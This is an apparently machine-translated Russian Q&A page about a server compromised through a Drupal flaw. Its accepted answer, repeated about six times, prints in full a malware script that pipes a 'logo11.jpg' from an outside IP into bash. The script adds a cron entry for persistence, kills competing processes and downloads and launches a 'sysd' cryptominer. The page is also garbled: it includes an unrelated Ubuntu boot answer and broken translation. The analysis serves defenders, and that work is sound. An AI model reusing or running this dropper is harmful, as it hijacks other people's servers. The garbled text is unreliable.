сервер скомпрометирован - ./sysd -c apache.cf -t 1 есть все memmory

Question 1

При загрузке Ubuntu Live DVD / USB внимательно следите, и на одном из ранних экранов вы увидите значок маленького человека внизу / в центре экрана.

Я забыл который ...

Либо:

щелкните значок маленького человека, нажав кнопку со стрелкой вниз, когда вы увидите значок маленького человека, удерживайте клавишу переключения до / во время иконки маленького человека [ ! d3]

Как только вы увидите параметры загрузки, включите опцию nomodeset и попытайтесь продолжить загрузку.

Question 2

Присмотритесь к завитушке.

Выполняет команду bash, а имя скрипта bash - logo11.jpg.

curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s

Это всего лишь очень дешевый трюк и не очень сложный. Если вы поместите команду в другой порядок и загрузите файл, команда будет выглядеть примерно так:

ПОЖАЛУЙСТА, БУДЬТЕ КАРЬЮ, НЕ СКАЧИВАЙТЕ ФАЙЛ И ИСПОЛНИТЕ. ЭТО ИНФОРМАЦИОННО

bash -s logo11.jpg

Так что не обманывайте себя окончанием .jpg. Это не простой jpg, это просто текстовый файл с командами followow.

Onvce это в вашем cron, bash просто выполнит этот «Text» -File, который на самом деле является небольшим скриптом bash. Легко, да?

#!/bin/sh
pkill -f suppoie 
pkill -f vlqd
ps aux | grep -vw apache | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w syslogs |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/sysd http://136.144.175.206:4477/2/sysd
curl -o /var/tmp/apache.cf http://136.144.175.206:4477/2/null.cf
chmod 777 /var/tmp/sysd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sysd -c apache.cf -t `echo $cores` >/dev/null &
fi
sleep 3
echo "running....."

FYI - я отправил по электронной почте интернет-провайдеру, чтобы посмотреть на это, ip все еще жив, а файл все еще доступен для загрузки. Это достойная вещь, и именно поэтому я пишу это. Несколько строк могут помочь другому администратору.

Question 3

Question 4

Присмотритесь к завитушке.

Выполняет команду bash, а имя скрипта bash - logo11.jpg.

curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s

Это всего лишь очень дешевый трюк и не очень сложный. Если вы поместите команду в другой порядок и загрузите файл, команда будет выглядеть примерно так:

ПОЖАЛУЙСТА, БУДЬТЕ КАРЬЮ, НЕ СКАЧИВАЙТЕ ФАЙЛ И ИСПОЛНИТЕ. ЭТО ИНФОРМАЦИОННО

bash -s logo11.jpg

Так что не обманывайте себя окончанием .jpg. Это не простой jpg, это просто текстовый файл с командами followow.

Onvce это в вашем cron, bash просто выполнит этот «Text» -File, который на самом деле является небольшим скриптом bash. Легко, да?

#!/bin/sh
pkill -f suppoie 
pkill -f vlqd
ps aux | grep -vw apache | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w syslogs |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/sysd http://136.144.175.206:4477/2/sysd
curl -o /var/tmp/apache.cf http://136.144.175.206:4477/2/null.cf
chmod 777 /var/tmp/sysd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sysd -c apache.cf -t `echo $cores` >/dev/null &
fi
sleep 3
echo "running....."

FYI - я отправил по электронной почте интернет-провайдеру, чтобы посмотреть на это, ip все еще жив, а файл все еще доступен для загрузки. Это достойная вещь, и именно поэтому я пишу это. Несколько строк могут помочь другому администратору.

Question 5

Присмотритесь к завитушке.

Выполняет команду bash, а имя скрипта bash - logo11.jpg.

curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s

Это всего лишь очень дешевый трюк и не очень сложный. Если вы поместите команду в другой порядок и загрузите файл, команда будет выглядеть примерно так:

ПОЖАЛУЙСТА, БУДЬТЕ КАРЬЮ, НЕ СКАЧИВАЙТЕ ФАЙЛ И ИСПОЛНИТЕ. ЭТО ИНФОРМАЦИОННО

bash -s logo11.jpg

Так что не обманывайте себя окончанием .jpg. Это не простой jpg, это просто текстовый файл с командами followow.

Onvce это в вашем cron, bash просто выполнит этот «Text» -File, который на самом деле является небольшим скриптом bash. Легко, да?

#!/bin/sh
pkill -f suppoie 
pkill -f vlqd
ps aux | grep -vw apache | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w syslogs |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/sysd http://136.144.175.206:4477/2/sysd
curl -o /var/tmp/apache.cf http://136.144.175.206:4477/2/null.cf
chmod 777 /var/tmp/sysd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sysd -c apache.cf -t `echo $cores` >/dev/null &
fi
sleep 3
echo "running....."

FYI - я отправил по электронной почте интернет-провайдеру, чтобы посмотреть на это, ip все еще жив, а файл все еще доступен для загрузки. Это достойная вещь, и именно поэтому я пишу это. Несколько строк могут помочь другому администратору.

s1mmel · Accepted Answer · 22 May 2018 в 10:45

Присмотритесь к завитушке.

Выполняет команду bash, а имя скрипта bash - logo11.jpg.

curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s

Это всего лишь очень дешевый трюк и не очень сложный. Если вы поместите команду в другой порядок и загрузите файл, команда будет выглядеть примерно так:

ПОЖАЛУЙСТА, БУДЬТЕ КАРЬЮ, НЕ СКАЧИВАЙТЕ ФАЙЛ И ИСПОЛНИТЕ. ЭТО ИНФОРМАЦИОННО

bash -s logo11.jpg

Так что не обманывайте себя окончанием .jpg. Это не простой jpg, это просто текстовый файл с командами followow.

Onvce это в вашем cron, bash просто выполнит этот «Text» -File, который на самом деле является небольшим скриптом bash. Легко, да?

#!/bin/sh
pkill -f suppoie 
pkill -f vlqd
ps aux | grep -vw apache | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w syslogs |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/sysd http://136.144.175.206:4477/2/sysd
curl -o /var/tmp/apache.cf http://136.144.175.206:4477/2/null.cf
chmod 777 /var/tmp/sysd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sysd -c apache.cf -t `echo $cores` >/dev/null &
fi
sleep 3
echo "running....."

FYI - я отправил по электронной почте интернет-провайдеру, чтобы посмотреть на это, ip все еще жив, а файл все еще доступен для загрузки. Это достойная вещь, и именно поэтому я пишу это. Несколько строк могут помочь другому администратору.

Привет, спасибо, да, я вижу это. Я просто не знаю, как он может выполнить файл — user1031742, 13 May 2018 в 05:17
Когда crontab читает запись, она выполняет ее. Послушайте, это будет команда (simplefied). bash -s logo11.jpg (это означает, что он выполнит каждую команду, которую вы видите в моем сообщении). Есть еще две линии curl, которые указывают, что загружаются два файла. sysd и null.cf Как они могли это сделать, я тоже не могу сказать. Я бы сказал, что им удалось внедрить это в систему через apache из-за плохого кода или эксплойта или плохой настройки, может быть, даже смеси всех. — s1mmel, 13 May 2018 в 08:28
Привет, я понял, что это уязвимость drupal, обнаруженная недавно - isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/… BTW. как вы расшифровали файл? Спасибо за помощь — user1031742, 13 May 2018 в 13:54
Я покажу вам, что это очень просто в любом случае ... о, и я обновлю ответ на другой, чтобы найти это более легко — s1mmel, 14 May 2018 в 16:36
привет, поэтому, пожалуйста, покажите мне, как декодировать файл. Вы использовали какой-либо онлайн-декодер? — user1031742, 17 May 2018 в 04:22

s1mmel · Accepted Answer · 17 July 2018 в 14:27

Присмотритесь к завитушке.

Выполняет команду bash, а имя скрипта bash - logo11.jpg.

curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s

Это всего лишь очень дешевый трюк и не очень сложный. Если вы поместите команду в другой порядок и загрузите файл, команда будет выглядеть примерно так:

ПОЖАЛУЙСТА, БУДЬТЕ КАРЬЮ, НЕ СКАЧИВАЙТЕ ФАЙЛ И ИСПОЛНИТЕ. ЭТО ИНФОРМАЦИОННО

bash -s logo11.jpg

Так что не обманывайте себя окончанием .jpg. Это не простой jpg, это просто текстовый файл с командами followow.

Onvce это в вашем cron, bash просто выполнит этот «Text» -File, который на самом деле является небольшим скриптом bash. Легко, да?

#!/bin/sh
pkill -f suppoie 
pkill -f vlqd
ps aux | grep -vw apache | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w syslogs |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/sysd http://136.144.175.206:4477/2/sysd
curl -o /var/tmp/apache.cf http://136.144.175.206:4477/2/null.cf
chmod 777 /var/tmp/sysd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sysd -c apache.cf -t `echo $cores` >/dev/null &
fi
sleep 3
echo "running....."

FYI - я отправил по электронной почте интернет-провайдеру, чтобы посмотреть на это, ip все еще жив, а файл все еще доступен для загрузки. Это достойная вещь, и именно поэтому я пишу это. Несколько строк могут помочь другому администратору.

s1mmel · Accepted Answer · 20 July 2018 в 14:31

Присмотритесь к завитушке.

Выполняет команду bash, а имя скрипта bash - logo11.jpg.

curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s

Это всего лишь очень дешевый трюк и не очень сложный. Если вы поместите команду в другой порядок и загрузите файл, команда будет выглядеть примерно так:

ПОЖАЛУЙСТА, БУДЬТЕ КАРЬЮ, НЕ СКАЧИВАЙТЕ ФАЙЛ И ИСПОЛНИТЕ. ЭТО ИНФОРМАЦИОННО

bash -s logo11.jpg

Так что не обманывайте себя окончанием .jpg. Это не простой jpg, это просто текстовый файл с командами followow.

Onvce это в вашем cron, bash просто выполнит этот «Text» -File, который на самом деле является небольшим скриптом bash. Легко, да?

#!/bin/sh
pkill -f suppoie 
pkill -f vlqd
ps aux | grep -vw apache | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w syslogs |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/sysd http://136.144.175.206:4477/2/sysd
curl -o /var/tmp/apache.cf http://136.144.175.206:4477/2/null.cf
chmod 777 /var/tmp/sysd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sysd -c apache.cf -t `echo $cores` >/dev/null &
fi
sleep 3
echo "running....."

FYI - я отправил по электронной почте интернет-провайдеру, чтобы посмотреть на это, ip все еще жив, а файл все еще доступен для загрузки. Это достойная вещь, и именно поэтому я пишу это. Несколько строк могут помочь другому администратору.

сервер скомпрометирован - ./sysd -c apache.cf -t 1 есть все memmory

3 ответа

Другие вопросы по тегам:

Похожие вопросы: